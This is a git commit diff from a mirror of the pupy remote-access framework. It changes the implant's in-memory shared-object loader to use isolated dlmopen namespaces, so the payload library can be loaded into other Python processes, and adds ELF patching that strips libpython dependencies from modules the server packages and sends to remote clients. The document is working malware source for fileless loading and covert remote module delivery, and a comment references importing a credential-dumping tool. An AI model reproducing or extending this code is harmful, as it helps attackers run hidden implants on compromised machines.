mirror of https://github.com/n1nj4sec/pupy.git
linux/client: Add LMID support
Do not use RTLD_GLOBAL namespace for python. This allows to load shared object with other copies of python. Example: > python3 Python 3.6.5 (default, Jun 30 2018, 10:35:51) [GCC 7.3.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> import ctypes; ctypes.CDLL('/tmp/ppd.so') This requires latest tc-linux32/tc-linux64 toolchains
This commit is contained in:
parent
691b52e8c7
commit
6fd57e4503
|
@ -348,6 +348,24 @@ pid_t memexec(const char *buffer, size_t size, const char* const* argv, int stdi
|
||||||
return -1;
|
return -1;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#ifdef LM_ID_NEWLM
|
||||||
|
static void *_dlopen(const char *path, int flags) {
|
||||||
|
static Lmid_t lmid = LM_ID_NEWLM;
|
||||||
|
|
||||||
|
flags &= ~RTLD_GLOBAL;
|
||||||
|
|
||||||
|
void *handle = dlmopen(lmid, path, flags);
|
||||||
|
if (lmid == LM_ID_NEWLM && handle) {
|
||||||
|
dlinfo(handle, RTLD_DI_LMID, &lmid);
|
||||||
|
dprint("memdlopen - dlmopen - new lmid created: %08x\n", lmid);
|
||||||
|
}
|
||||||
|
|
||||||
|
return handle;
|
||||||
|
}
|
||||||
|
#else
|
||||||
|
#define _dlopen(path, flags) dlopen(path, flags)
|
||||||
|
#endif
|
||||||
|
|
||||||
void *memdlopen(const char *soname, const char *buffer, size_t size) {
|
void *memdlopen(const char *soname, const char *buffer, size_t size) {
|
||||||
dprint("memdlopen(\"%s\", %p, %ull)\n", soname, buffer, size);
|
dprint("memdlopen(\"%s\", %p, %ull)\n", soname, buffer, size);
|
||||||
|
|
||||||
|
@ -366,7 +384,7 @@ void *memdlopen(const char *soname, const char *buffer, size_t size) {
|
||||||
return search.base;
|
return search.base;
|
||||||
}
|
}
|
||||||
|
|
||||||
void *base = dlopen(soname, RTLD_NOLOAD);
|
void *base = _dlopen(soname, RTLD_NOLOAD);
|
||||||
if (base) {
|
if (base) {
|
||||||
dprint("Library \"%s\" loaded from OS\n", soname);
|
dprint("Library \"%s\" loaded from OS\n", soname);
|
||||||
return base;
|
return base;
|
||||||
|
@ -415,7 +433,11 @@ void *memdlopen(const char *soname, const char *buffer, size_t size) {
|
||||||
bool is_memfd = false;
|
bool is_memfd = false;
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
base = dlopen(buf, RTLD_NOW | RTLD_GLOBAL);
|
int flags = RTLD_NOW | RTLD_LOCAL;
|
||||||
|
|
||||||
|
dprint("dlopen(%s, %08x)\n", buf, flags);
|
||||||
|
base = _dlopen(buf, flags);
|
||||||
|
dprint("dlopen(%s, %08x) = %p\n", buf, flags, base);
|
||||||
if (!is_memfd) {
|
if (!is_memfd) {
|
||||||
dprint("Close fd: %d\n", fd);
|
dprint("Close fd: %d\n", fd);
|
||||||
close(fd);
|
close(fd);
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
Subproject commit 218abc23b1231bba33fe272ffc1e5dbc5317078f
|
Subproject commit 3bded1c0f194c957684d887582f901991597c21d
|
|
@ -57,7 +57,9 @@ class PupyClient(object):
|
||||||
}
|
}
|
||||||
|
|
||||||
#alias
|
#alias
|
||||||
self.conn = self.desc["conn"]
|
self.conn = self.desc['conn']
|
||||||
|
self.native = self.desc['native']
|
||||||
|
|
||||||
self.pupsrv = pupsrv
|
self.pupsrv = pupsrv
|
||||||
self.imported_dlls = set()
|
self.imported_dlls = set()
|
||||||
self.imported_modules = set()
|
self.imported_modules = set()
|
||||||
|
@ -338,7 +340,7 @@ class PupyClient(object):
|
||||||
if name in self.imported_dlls:
|
if name in self.imported_dlls:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
buf = dependencies.dll(name, self.platform, self.arch)
|
buf = dependencies.dll(name, self.platform, self.arch, native=self.native)
|
||||||
if not buf:
|
if not buf:
|
||||||
raise ImportError('Shared object {} not found'.format(name))
|
raise ImportError('Shared object {} not found'.format(name))
|
||||||
|
|
||||||
|
@ -455,7 +457,7 @@ class PupyClient(object):
|
||||||
posix=self.is_posix(), honor_ignore=honor_ignore,
|
posix=self.is_posix(), honor_ignore=honor_ignore,
|
||||||
filter_needed_cb=lambda modules, dll: self.filter_new_modules(
|
filter_needed_cb=lambda modules, dll: self.filter_new_modules(
|
||||||
modules, dll, forced, remote
|
modules, dll, forced, remote
|
||||||
)
|
), native=self.native
|
||||||
)
|
)
|
||||||
|
|
||||||
self.cached_modules.update(contents)
|
self.cached_modules.update(contents)
|
||||||
|
@ -509,17 +511,17 @@ class PupyClient(object):
|
||||||
self.remote_invalidate_module(module_name)
|
self.remote_invalidate_module(module_name)
|
||||||
|
|
||||||
def remote_load_package(self, module_name):
|
def remote_load_package(self, module_name):
|
||||||
logger.debug('remote_load_package for %s started', module_name)
|
logger.info('remote_load_package for %s started', module_name)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
return self.load_package(module_name, remote=True)
|
return self.load_package(module_name, remote=True)
|
||||||
|
|
||||||
except dependencies.NotFoundError:
|
except dependencies.NotFoundError:
|
||||||
logger.debug('remote_load_package for %s failed', module_name)
|
logger.info('remote_load_package for %s failed', module_name)
|
||||||
return None, None
|
return None, None
|
||||||
|
|
||||||
finally:
|
finally:
|
||||||
logger.debug('remote_load_package for %s completed', module_name)
|
logger.info('remote_load_package for %s completed', module_name)
|
||||||
|
|
||||||
def remote_print_error(self, msg):
|
def remote_print_error(self, msg):
|
||||||
self.pupsrv.handler.display_warning(msg)
|
self.pupsrv.handler.display_warning(msg)
|
||||||
|
|
|
@ -7,6 +7,9 @@ import cPickle
|
||||||
import zlib
|
import zlib
|
||||||
from zipfile import ZipFile
|
from zipfile import ZipFile
|
||||||
|
|
||||||
|
from elftools.elf.elffile import ELFFile
|
||||||
|
from io import BytesIO
|
||||||
|
|
||||||
from pupylib.PupyCompile import pupycompile
|
from pupylib.PupyCompile import pupycompile
|
||||||
from pupylib import ROOT, getLogger
|
from pupylib import ROOT, getLogger
|
||||||
|
|
||||||
|
@ -119,6 +122,41 @@ WELL_KNOWN_DEPS = {
|
||||||
|
|
||||||
logger.debug("LIBS_AUTHORIZED_PATHS=%s"%repr(LIBS_AUTHORIZED_PATHS))
|
logger.debug("LIBS_AUTHORIZED_PATHS=%s"%repr(LIBS_AUTHORIZED_PATHS))
|
||||||
|
|
||||||
|
def remove_dt_needed(data, libname):
|
||||||
|
ef = ELFFile(data)
|
||||||
|
dyn = ef.get_section_by_name('.dynamic')
|
||||||
|
|
||||||
|
ent_size = dyn.header.sh_entsize
|
||||||
|
sect_size = dyn.header.sh_size
|
||||||
|
sect_offt = dyn.header.sh_offset
|
||||||
|
|
||||||
|
tag_idx = None
|
||||||
|
|
||||||
|
for idx in xrange(sect_size/ent_size):
|
||||||
|
tag = dyn.get_tag(idx)
|
||||||
|
if tag['d_tag'] == 'DT_NEEDED':
|
||||||
|
if tag.needed == libname:
|
||||||
|
tag_idx = idx
|
||||||
|
break
|
||||||
|
|
||||||
|
if tag_idx is None:
|
||||||
|
return False
|
||||||
|
|
||||||
|
null_tag = '\x00' * ent_size
|
||||||
|
dynamic_tail = None
|
||||||
|
|
||||||
|
if idx == 0:
|
||||||
|
dynamic_tail = dyn.data()[ent_size:] + null_tag
|
||||||
|
else:
|
||||||
|
dyndata = dyn.data()
|
||||||
|
dynamic_tail = dyndata[:ent_size*(idx)] + \
|
||||||
|
dyndata[ent_size*(idx+1):] + null_tag
|
||||||
|
|
||||||
|
data.seek(sect_offt)
|
||||||
|
data.write(dynamic_tail)
|
||||||
|
return True
|
||||||
|
|
||||||
|
|
||||||
def safe_file_exists(f):
|
def safe_file_exists(f):
|
||||||
""" some file systems like vmhgfs are case insensitive and os.isdir() return True for "lAzAgNE", so we need this check for modules like LaZagne.py and lazagne gets well imported """
|
""" some file systems like vmhgfs are case insensitive and os.isdir() return True for "lAzAgNE", so we need this check for modules like LaZagne.py and lazagne gets well imported """
|
||||||
return os.path.basename(f) in os.listdir(os.path.dirname(f))
|
return os.path.basename(f) in os.listdir(os.path.dirname(f))
|
||||||
|
@ -137,7 +175,7 @@ sys.modules[fullname]=mod
|
||||||
|
|
||||||
return code
|
return code
|
||||||
|
|
||||||
def importer(dependencies, os='all', arch=None, path=None, posix=None):
|
def importer(dependencies, os='all', arch=None, path=None, posix=None, native=False):
|
||||||
if path:
|
if path:
|
||||||
modules = {}
|
modules = {}
|
||||||
if not type(dependencies) in (list, tuple, set, frozenset):
|
if not type(dependencies) in (list, tuple, set, frozenset):
|
||||||
|
@ -149,11 +187,22 @@ def importer(dependencies, os='all', arch=None, path=None, posix=None):
|
||||||
blob = cPickle.dumps(modules)
|
blob = cPickle.dumps(modules)
|
||||||
blob = zlib.compress(blob, 9)
|
blob = zlib.compress(blob, 9)
|
||||||
else:
|
else:
|
||||||
blob, modules, _ = package(dependencies, os, arch, posix=posix)
|
blob, modules, _ = package(dependencies, os, arch, posix=posix, native=native)
|
||||||
|
|
||||||
return 'pupyimporter.pupy_add_package({}, compressed=True)'.format(repr(blob))
|
return 'pupyimporter.pupy_add_package({}, compressed=True)'.format(repr(blob))
|
||||||
|
|
||||||
def get_content(platform, arch, prefix, filepath, archive=None, honor_ignore=True):
|
def modify_native_content(filename, content):
|
||||||
|
if content.startswith('\x7fELF'):
|
||||||
|
logger.info('ELF file - %s, check for libpython DT_NEED record', filename)
|
||||||
|
image = BytesIO(content)
|
||||||
|
if remove_dt_needed(image, 'libpython2.7.so.1.0'):
|
||||||
|
logger.info('Modified: DT_NEEDED libpython2.7.so.1.0 removed')
|
||||||
|
|
||||||
|
content = image.getvalue()
|
||||||
|
|
||||||
|
return content
|
||||||
|
|
||||||
|
def get_content(platform, arch, prefix, filepath, archive=None, honor_ignore=True, native=False):
|
||||||
if filepath.startswith(prefix) and honor_ignore:
|
if filepath.startswith(prefix) and honor_ignore:
|
||||||
basepath = filepath[len(prefix)+1:]
|
basepath = filepath[len(prefix)+1:]
|
||||||
basepath, ext = os.path.splitext(basepath)
|
basepath, ext = os.path.splitext(basepath)
|
||||||
|
@ -199,13 +248,23 @@ def get_content(platform, arch, prefix, filepath, archive=None, honor_ignore=Tru
|
||||||
logger.info('Patch: Ignore %s (%s)', filepath, ignore)
|
logger.info('Patch: Ignore %s (%s)', filepath, ignore)
|
||||||
raise IgnoreFileException()
|
raise IgnoreFileException()
|
||||||
|
|
||||||
|
content = None
|
||||||
|
|
||||||
if archive:
|
if archive:
|
||||||
return archive.read(filepath)
|
content = archive.read(filepath)
|
||||||
else:
|
else:
|
||||||
with open(filepath, 'rb') as filedata:
|
with open(filepath, 'rb') as filedata:
|
||||||
return filedata.read()
|
content = filedata.read()
|
||||||
|
|
||||||
|
if not native:
|
||||||
|
logger.debug('Modify natve content for %s (native=%s)', filepath, bool(native))
|
||||||
|
content = modify_native_content(filepath, content)
|
||||||
|
|
||||||
|
return content
|
||||||
|
|
||||||
|
def from_path(platform, arch, search_path, start_path, pure_python_only=False,
|
||||||
|
remote=False, honor_ignore=True, native=False):
|
||||||
|
|
||||||
def from_path(platform, arch, search_path, start_path, pure_python_only=False, remote=False, honor_ignore=True):
|
|
||||||
query = start_path
|
query = start_path
|
||||||
|
|
||||||
modules_dic = {}
|
modules_dic = {}
|
||||||
|
@ -243,7 +302,8 @@ def from_path(platform, arch, search_path, start_path, pure_python_only=False, r
|
||||||
arch,
|
arch,
|
||||||
search_path,
|
search_path,
|
||||||
os.path.join(root, f),
|
os.path.join(root, f),
|
||||||
honor_ignore=honor_ignore)
|
honor_ignore=honor_ignore,
|
||||||
|
native=native)
|
||||||
except IgnoreFileException:
|
except IgnoreFileException:
|
||||||
continue
|
continue
|
||||||
|
|
||||||
|
@ -300,7 +360,8 @@ def from_path(platform, arch, search_path, start_path, pure_python_only=False, r
|
||||||
arch,
|
arch,
|
||||||
search_path,
|
search_path,
|
||||||
filepath,
|
filepath,
|
||||||
honor_ignore=honor_ignore)
|
honor_ignore=honor_ignore,
|
||||||
|
native=native)
|
||||||
except IgnoreFileException:
|
except IgnoreFileException:
|
||||||
break
|
break
|
||||||
|
|
||||||
|
@ -363,18 +424,21 @@ def _dependencies(module_name, os, dependencies):
|
||||||
dependencies.add(module_name)
|
dependencies.add(module_name)
|
||||||
|
|
||||||
mod_deps = WELL_KNOWN_DEPS.get(module_name, {})
|
mod_deps = WELL_KNOWN_DEPS.get(module_name, {})
|
||||||
|
|
||||||
for dependency in mod_deps.get('all', []) + mod_deps.get(os, []):
|
for dependency in mod_deps.get('all', []) + mod_deps.get(os, []):
|
||||||
_dependencies(dependency, os, dependencies)
|
_dependencies(dependency, os, dependencies)
|
||||||
|
|
||||||
def _package(modules, module_name, platform, arch, remote=False, posix=None, honor_ignore=True):
|
def _package(modules, module_name, platform, arch, remote=False, posix=None, honor_ignore=True, native=False):
|
||||||
|
|
||||||
initial_module_name = module_name
|
initial_module_name = module_name
|
||||||
|
|
||||||
start_path = module_name.replace('.', os.path.sep)
|
start_path = module_name.replace('.', os.path.sep)
|
||||||
|
|
||||||
for search_path in paths(platform, arch, posix):
|
for search_path in paths(platform, arch, posix):
|
||||||
modules_dic = from_path(platform, arch, search_path, start_path,
|
modules_dic = from_path(
|
||||||
remote=remote, honor_ignore=honor_ignore)
|
platform, arch, search_path, start_path,
|
||||||
|
remote=remote, honor_ignore=honor_ignore,
|
||||||
|
native=native)
|
||||||
if modules_dic:
|
if modules_dic:
|
||||||
break
|
break
|
||||||
|
|
||||||
|
@ -399,6 +463,7 @@ def _package(modules, module_name, platform, arch, remote=False, posix=None, hon
|
||||||
content = None
|
content = None
|
||||||
if info.filename.startswith(start_paths):
|
if info.filename.startswith(start_paths):
|
||||||
module_name = info.filename
|
module_name = info.filename
|
||||||
|
|
||||||
for prefix in COMMON_SEARCH_PREFIXES:
|
for prefix in COMMON_SEARCH_PREFIXES:
|
||||||
if module_name.startswith(prefix+'/'):
|
if module_name.startswith(prefix+'/'):
|
||||||
module_name = module_name[len(prefix)+1:]
|
module_name = module_name[len(prefix)+1:]
|
||||||
|
@ -416,7 +481,8 @@ def _package(modules, module_name, platform, arch, remote=False, posix=None, hon
|
||||||
get_content(
|
get_content(
|
||||||
platform, arch, prefix,
|
platform, arch, prefix,
|
||||||
info.filename, archive,
|
info.filename, archive,
|
||||||
honor_ignore=honor_ignore),
|
honor_ignore=honor_ignore,
|
||||||
|
native=native),
|
||||||
info.filename)
|
info.filename)
|
||||||
except IgnoreFileException:
|
except IgnoreFileException:
|
||||||
continue
|
continue
|
||||||
|
@ -454,7 +520,8 @@ def _package(modules, module_name, platform, arch, remote=False, posix=None, hon
|
||||||
content = get_content(
|
content = get_content(
|
||||||
platform, arch, prefix,
|
platform, arch, prefix,
|
||||||
info.filename, archive,
|
info.filename, archive,
|
||||||
honor_ignore=honor_ignore)
|
honor_ignore=honor_ignore,
|
||||||
|
native=native)
|
||||||
except IgnoreFileException:
|
except IgnoreFileException:
|
||||||
continue
|
continue
|
||||||
|
|
||||||
|
@ -488,7 +555,8 @@ def _package(modules, module_name, platform, arch, remote=False, posix=None, hon
|
||||||
|
|
||||||
modules.update(modules_dic)
|
modules.update(modules_dic)
|
||||||
|
|
||||||
def package(requirements, platform, arch, remote=False, posix=False, filter_needed_cb=None, honor_ignore=True):
|
def package(requirements, platform, arch, remote=False, posix=False,
|
||||||
|
filter_needed_cb=None, honor_ignore=True, native=False):
|
||||||
dependencies = set()
|
dependencies = set()
|
||||||
|
|
||||||
if not type(requirements) in (list, tuple, set, frozenset):
|
if not type(requirements) in (list, tuple, set, frozenset):
|
||||||
|
@ -524,7 +592,8 @@ def package(requirements, platform, arch, remote=False, posix=False, filter_need
|
||||||
_package(
|
_package(
|
||||||
modules, dependency, platform, arch,
|
modules, dependency, platform, arch,
|
||||||
remote=remote, posix=posix,
|
remote=remote, posix=posix,
|
||||||
honor_ignore=honor_ignore
|
honor_ignore=honor_ignore,
|
||||||
|
native=native
|
||||||
)
|
)
|
||||||
|
|
||||||
blob = zlib.compress(cPickle.dumps(modules), 9)
|
blob = zlib.compress(cPickle.dumps(modules), 9)
|
||||||
|
@ -552,7 +621,7 @@ def bundle(platform, arch):
|
||||||
|
|
||||||
return ZipFile(arch_bundle, 'r')
|
return ZipFile(arch_bundle, 'r')
|
||||||
|
|
||||||
def dll(name, platform, arch, honor_ignore=True):
|
def dll(name, platform, arch, honor_ignore=True, native=False):
|
||||||
buf = b''
|
buf = b''
|
||||||
|
|
||||||
for packages_path in paths(platform, arch):
|
for packages_path in paths(platform, arch):
|
||||||
|
@ -561,7 +630,7 @@ def dll(name, platform, arch, honor_ignore=True):
|
||||||
try:
|
try:
|
||||||
buf = get_content(
|
buf = get_content(
|
||||||
platform, arch, name, packages_path, dll_path,
|
platform, arch, name, packages_path, dll_path,
|
||||||
honor_ignore=honor_ignore)
|
honor_ignore=honor_ignore, native=native)
|
||||||
except IgnoreFileException:
|
except IgnoreFileException:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
@ -577,7 +646,8 @@ def dll(name, platform, arch, honor_ignore=True):
|
||||||
platform, arch, os.path.dirname(info.filename),
|
platform, arch, os.path.dirname(info.filename),
|
||||||
info.filename,
|
info.filename,
|
||||||
archive,
|
archive,
|
||||||
honor_ignore=honor_ignore
|
honor_ignore=honor_ignore,
|
||||||
|
native=native
|
||||||
)
|
)
|
||||||
except IgnoreFileException:
|
except IgnoreFileException:
|
||||||
pass
|
pass
|
||||||
|
|
|
@ -35,6 +35,7 @@ fusepy
|
||||||
defusedxml
|
defusedxml
|
||||||
keyboard
|
keyboard
|
||||||
puttykeys
|
puttykeys
|
||||||
|
pyelftools
|
||||||
-e external/pykcp
|
-e external/pykcp
|
||||||
flake8
|
flake8
|
||||||
flake8-per-file-ignores
|
flake8-per-file-ignores
|
||||||
|
|
Loading…
Reference in New Issue